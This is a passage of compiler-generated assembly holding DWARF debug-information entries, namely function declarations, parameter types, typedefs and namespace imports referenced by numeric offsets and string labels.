.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c6d:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1c73:0x16 DW_TAG_subprogram
.long .Linfo_string177 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 187 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c7e:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c83:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1c89:0x21 DW_TAG_subprogram
.long .Linfo_string178 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 834 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c95:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c9a:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c9f:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ca4:0x5 DW_TAG_formal_parameter
.long 7338 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x1caa:0x5 DW_TAG_restrict_type
.long 7343 # DW_AT_type
.byte 39 # Abbrev [39] 0x1caf:0x5 DW_TAG_pointer_type
.long 7348 # DW_AT_type
.byte 37 # Abbrev [37] 0x1cb4:0x5 DW_TAG_const_type
.long 7353 # DW_AT_type
.byte 36 # Abbrev [36] 0x1cb9:0x5 DW_TAG_structure_type
.long .Linfo_string179 # DW_AT_name
# DW_AT_declaration
.byte 68 # Abbrev [68] 0x1cbe:0x11 DW_TAG_subprogram
.long .Linfo_string180 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 222 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1cc9:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1ccf:0x1b DW_TAG_subprogram
.long .Linfo_string181 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 101 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1cda:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1cdf:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ce4:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1cea:0x1b DW_TAG_subprogram
.long .Linfo_string182 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 109 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1cf5:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1cfa:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1cff:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1d05:0x1b DW_TAG_subprogram
.long .Linfo_string183 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 92 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1d10:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d15:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d1a:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1d20:0x21 DW_TAG_subprogram
.long .Linfo_string184 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 343 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1d2c:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d31:0x5 DW_TAG_formal_parameter
.long 7489 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d36:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d3b:0x5 DW_TAG_formal_parameter
.long 6699 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x1d41:0x5 DW_TAG_restrict_type
.long 7494 # DW_AT_type
.byte 39 # Abbrev [39] 0x1d46:0x5 DW_TAG_pointer_type
.long 6541 # DW_AT_type
.byte 68 # Abbrev [68] 0x1d4b:0x16 DW_TAG_subprogram
.long .Linfo_string185 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 191 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1d56:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d5b:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1d61:0x17 DW_TAG_subprogram
.long .Linfo_string186 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 377 # DW_AT_decl_line
.long 7544 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1d6d:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d72:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 38 # Abbrev [38] 0x1d78:0x7 DW_TAG_base_type
.long .Linfo_string187 # DW_AT_name
.byte 4 # DW_AT_encoding
.byte 8 # DW_AT_byte_size
.byte 63 # Abbrev [63] 0x1d7f:0x5 DW_TAG_restrict_type
.long 7556 # DW_AT_type
.byte 39 # Abbrev [39] 0x1d84:0x5 DW_TAG_pointer_type
.long 6468 # DW_AT_type
.byte 60 # Abbrev [60] 0x1d89:0x17 DW_TAG_subprogram
.long .Linfo_string188 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 382 # DW_AT_decl_line
.long 7584 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1d95:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1d9a:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 38 # Abbrev [38] 0x1da0:0x7 DW_TAG_base_type
.long .Linfo_string189 # DW_AT_name
.byte 4 # DW_AT_encoding
.byte 4 # DW_AT_byte_size
.byte 68 # Abbrev [68] 0x1da7:0x1b DW_TAG_subprogram
.long .Linfo_string190 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 217 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1db2:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1db7:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1dbc:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1dc2:0x1c DW_TAG_subprogram
.long .Linfo_string191 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 428 # DW_AT_decl_line
.long 6333 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1dce:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1dd3:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 10 # Abbrev [10] 0x1dd8:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1dde:0x1c DW_TAG_subprogram
.long .Linfo_string192 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 433 # DW_AT_decl_line
.long 6421 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1dea:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1def:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 10 # Abbrev [10] 0x1df4:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1dfa:0x1b DW_TAG_subprogram
.long .Linfo_string193 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 135 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1e05:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e0a:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e0f:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1e15:0x12 DW_TAG_subprogram
.long .Linfo_string194 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 324 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1e21:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1e27:0x1c DW_TAG_subprogram
.long .Linfo_string195 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 258 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1e33:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e38:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e3d:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1e43:0x1c DW_TAG_subprogram
.long .Linfo_string196 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 262 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1e4f:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e54:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e59:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1e5f:0x1c DW_TAG_subprogram
.long .Linfo_string197 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 267 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1e6b:0x5 DW_TAG_formal_parameter
.long 6468 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e70:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e75:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1e7b:0x1c DW_TAG_subprogram
.long .Linfo_string198 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 271 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1e87:0x5 DW_TAG_formal_parameter
.long 6468 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e8c:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 10 # Abbrev [10] 0x1e91:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1e97:0x13 DW_TAG_subprogram
.long .Linfo_string199 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 587 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ea3:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 64 # Abbrev [64] 0x1ea8:0x1 DW_TAG_unspecified_parameters
.byte 0 # End Of Children Mark
.byte 33 # Abbrev [33] 0x1eaa:0x17 DW_TAG_subprogram
.long .Linfo_string200 # DW_AT_linkage_name
.long .Linfo_string201 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 644 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1eba:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 64 # Abbrev [64] 0x1ebf:0x1 DW_TAG_unspecified_parameters
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1ec1:0x16 DW_TAG_subprogram
.long .Linfo_string202 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 164 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ecc:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ed1:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1ed7:0x16 DW_TAG_subprogram
.long .Linfo_string203 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 201 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ee2:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ee7:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1eed:0x16 DW_TAG_subprogram
.long .Linfo_string204 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 174 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ef8:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1efd:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1f03:0x16 DW_TAG_subprogram
.long .Linfo_string205 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 212 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1f0e:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1f13:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1f19:0x1b DW_TAG_subprogram
.long .Linfo_string206 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 253 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1f24:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1f29:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 10 # Abbrev [10] 0x1f2e:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 2 # Abbrev [2] 0x1f34:0x99 DW_TAG_namespace
.long .Linfo_string207 # DW_AT_name
.byte 43 # Abbrev [43] 0x1f39:0x7 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.byte 251 # DW_AT_decl_line
.long 8141 # DW_AT_import
.byte 44 # Abbrev [44] 0x1f40:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 260 # DW_AT_decl_line
.long 8171 # DW_AT_import
.byte 44 # Abbrev [44] 0x1f48:0x8 DW_TAG_imported_declaration
.byte 10 # DW_AT_decl_file
.short 261 # DW_AT_decl_line
.long 8199 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f50:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 200 # DW_AT_decl_line
.long 9821 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f57:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 206 # DW_AT_decl_line
.long 9862 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f5e:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 210 # DW_AT_decl_line
.long 9876 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f65:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 216 # DW_AT_decl_line
.long 9894 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f6c:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 227 # DW_AT_decl_line
.long 9917 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f73:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 228 # DW_AT_decl_line
.long 9935 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f7a:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 229 # DW_AT_decl_line
.long 9962 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f81:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 231 # DW_AT_decl_line
.long 9989 # DW_AT_import
.byte 43 # Abbrev [43] 0x1f88:0x7 DW_TAG_imported_declaration
.byte 28 # DW_AT_decl_file
.byte 232 # DW_AT_decl_line
.long 10011 # DW_AT_import
.byte 7 # Abbrev [7] 0x1f8f:0x1a DW_TAG_subprogram
.long .Linfo_string347 # DW_AT_linkage_name
.long .Linfo_string317 # DW_AT_name
.byte 28 # DW_AT_decl_file
.byte 213 # DW_AT_decl_line
.long 9821 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1f9e:0x5 DW_TAG_formal_parameter
.long 3509 # DW_AT_type
.byte 10 # Abbrev [10] 0x1fa3:0x5 DW_TAG_formal_parameter
.long 3509 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 43 # Abbrev [43] 0x1fa9:0x7 DW_TAG_imported_declaration
.byte 32 # DW_AT_decl_file
.byte 175 # DW_AT_decl_line
.long 10975 # DW_AT_import
.byte 43 # Abbrev [43] 0x1fb0:0x7 DW_TAG_imported_declaration
.byte 32 # DW_AT_decl_file
.byte 176 # DW_AT_decl_line
.long 11004 # DW_AT_import
.byte 43 # Abbrev [43] 0x1fb7:0x7 DW_TAG_imported_declaration
.byte 32 # DW_AT_decl_file
.byte 177 # DW_AT_decl_line
.long 11036 # DW_AT_import
.byte 43 # Abbrev [43] 0x1fbe:0x7 DW_TAG_imported_declaration
.byte 32 # DW_AT_decl_file
.byte 178 # DW_AT_decl_line
.long 11063 # DW_AT_import
.byte 43 # Abbrev [43] 0x1fc5:0x7 DW_TAG_imported_declaration
.byte 32 # DW_AT_decl_file
.byte 179 # DW_AT_decl_line
.long 11096 # DW_AT_import
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1fcd:0x17 DW_TAG_subprogram
.long .Linfo_string208 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 384 # DW_AT_decl_line
.long 8164 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1fd9:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1fde:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 38 # Abbrev [38] 0x1fe4:0x7 DW_TAG_base_type
.long .Linfo_string209 # DW_AT_name
.byte 4 # DW_AT_encoding
.byte 16 # DW_AT_byte_size
.byte 60 # Abbrev [60] 0x1feb:0x1c DW_TAG_subprogram
.long .Linfo_string210 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 441 # DW_AT_decl_line
.long 3509 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ff7:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ffc:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 10 # Abbrev [10] 0x2001:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x2007:0x1c DW_TAG_subprogram
.long .Linfo_string211 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 448 # DW_AT_decl_line
.long 8227 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x2013:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x2018:0x5 DW_TAG_formal_parameter
.long 7551 # DW_AT_type
.byte 10 # Abbrev [10] 0x201d:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 38 # Abbrev [38] 0x2023:0x7 DW_TAG_base_type
.long .Linfo_string212 # DW_AT_name
.byte 7 # DW_AT_encoding
.byte 8 # DW_AT_byte_size
.byte 39 # Abbrev [39] 0x202a:0x5 DW_TAG_pointer_type
.long 4049 # DW_AT_type
.byte 39 # Abbrev [39] 0x202f:0x5 DW_TAG_pointer_type
.long 8244 # DW_AT_type
.byte 37 # Abbrev [37] 0x2034:0x5 DW_TAG_const_type
.long 4049 # DW_AT_type
.byte 69 # Abbrev [69] 0x2039:0x5 DW_TAG_reference_type
.long 8244 # DW_AT_type
.byte 70 # Abbrev [70] 0x203e:0x5 DW_TAG_unspecified_type
.long .Linfo_string222 # DW_AT_name
.byte 71 # Abbrev [71] 0x2043:0x5 DW_TAG_rvalue_reference_type
.long 4049 # DW_AT_type
.byte 69 # Abbrev [69] 0x2048:0x5 DW_TAG_reference_type
.long 4049 # DW_AT_type
.byte 38 # Abbrev [38] 0x204d:0x7 DW_TAG_base_type
.long .Linfo_string232 # DW_AT_name
.byte 2 # DW_AT_encoding
.byte 1 # DW_AT_byte_size
.byte 39 # Abbrev [39] 0x2054:0x5 DW_TAG_pointer_type
.long 8281 # DW_AT_type
.byte 37 # Abbrev [37] 0x2059:0x5 DW_TAG_const_type
.long 4370 # DW_AT_type
.byte 2 # Abbrev [2] 0x205e:0xd DW_TAG_namespace
.long .Linfo_string238 # DW_AT_name
.byte 72 # Abbrev [72] 0x2063:0x7 DW_TAG_imported_module
.byte 18 # DW_AT_decl_file
.byte 58 # DW_AT_decl_line
.long 4399 # DW_AT_import
.byte 0 # End Of Children Mark
.byte 20 # Abbrev [20] 0x206b:0xb DW_TAG_typedef
.long 8310 # DW_AT_type
.long .Linfo_string241 # DW_AT_name
.byte 19 # DW_AT_decl_file
.byte 24 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2076:0xb DW_TAG_typedef
.long 6347 # DW_AT_type
.long .Linfo_string240 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 37 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2081:0xb DW_TAG_typedef
.long 8332 # DW_AT_type
.long .Linfo_string243 # DW_AT_name
.byte 19 # DW_AT_decl_file
.byte 25 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x208c:0xb DW_TAG_typedef
.long 3546 # DW_AT_type
.long .Linfo_string242 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 39 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2097:0xb DW_TAG_typedef
.long 8354 # DW_AT_type
.long .Linfo_string245 # DW_AT_name
.byte 19 # DW_AT_decl_file
.byte 26 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20a2:0xb DW_TAG_typedef
.long 5867 # DW_AT_type
.long .Linfo_string244 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 41 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20ad:0xb DW_TAG_typedef
.long 8376 # DW_AT_type
.long .Linfo_string247 # DW_AT_name
.byte 19 # DW_AT_decl_file
.byte 27 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20b8:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string246 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 44 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20c3:0xb DW_TAG_typedef
.long 6347 # DW_AT_type
.long .Linfo_string248 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 58 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20ce:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string249 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 60 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20d9:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string250 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 61 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20e4:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string251 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 62 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20ef:0xb DW_TAG_typedef
.long 8442 # DW_AT_type
.long .Linfo_string253 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 43 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x20fa:0xb DW_TAG_typedef
.long 8310 # DW_AT_type
.long .Linfo_string252 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 52 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2105:0xb DW_TAG_typedef
.long 8464 # DW_AT_type
.long .Linfo_string255 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 44 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2110:0xb DW_TAG_typedef
.long 8332 # DW_AT_type
.long .Linfo_string254 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 54 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x211b:0xb DW_TAG_typedef
.long 8486 # DW_AT_type
.long .Linfo_string257 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 45 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2126:0xb DW_TAG_typedef
.long 8354 # DW_AT_type
.long .Linfo_string256 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 56 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2131:0xb DW_TAG_typedef
.long 8508 # DW_AT_type
.long .Linfo_string259 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 46 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x213c:0xb DW_TAG_typedef
.long 8376 # DW_AT_type
.long .Linfo_string258 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 58 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2147:0xb DW_TAG_typedef
.long 8530 # DW_AT_type
.long .Linfo_string261 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 101 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2152:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string260 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 72 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x215d:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string262 # DW_AT_name
.byte 21 # DW_AT_decl_file
.byte 87 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2168:0xb DW_TAG_typedef
.long 8563 # DW_AT_type
.long .Linfo_string265 # DW_AT_name
.byte 4 # DW_AT_decl_file
.byte 24 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2173:0xb DW_TAG_typedef
.long 8574 # DW_AT_type
.long .Linfo_string264 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 38 # DW_AT_decl_line
.byte 38 # Abbrev [38] 0x217e:0x7 DW_TAG_base_type
.long .Linfo_string263 # DW_AT_name
.byte 8 # DW_AT_encoding
.byte 1 # DW_AT_byte_size
.byte 20 # Abbrev [20] 0x2185:0xb DW_TAG_typedef
.long 8592 # DW_AT_type
.long .Linfo_string267 # DW_AT_name
.byte 4 # DW_AT_decl_file
.byte 25 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x2190:0xb DW_TAG_typedef
.long 6340 # DW_AT_type
.long .Linfo_string266 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 40 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x219b:0xb DW_TAG_typedef
.long 8614 # DW_AT_type
.long .Linfo_string269 # DW_AT_name
.byte 4 # DW_AT_decl_file
.byte 27 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x21a6:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string268 # DW_AT_name
.byte 3 # DW_AT_decl_file
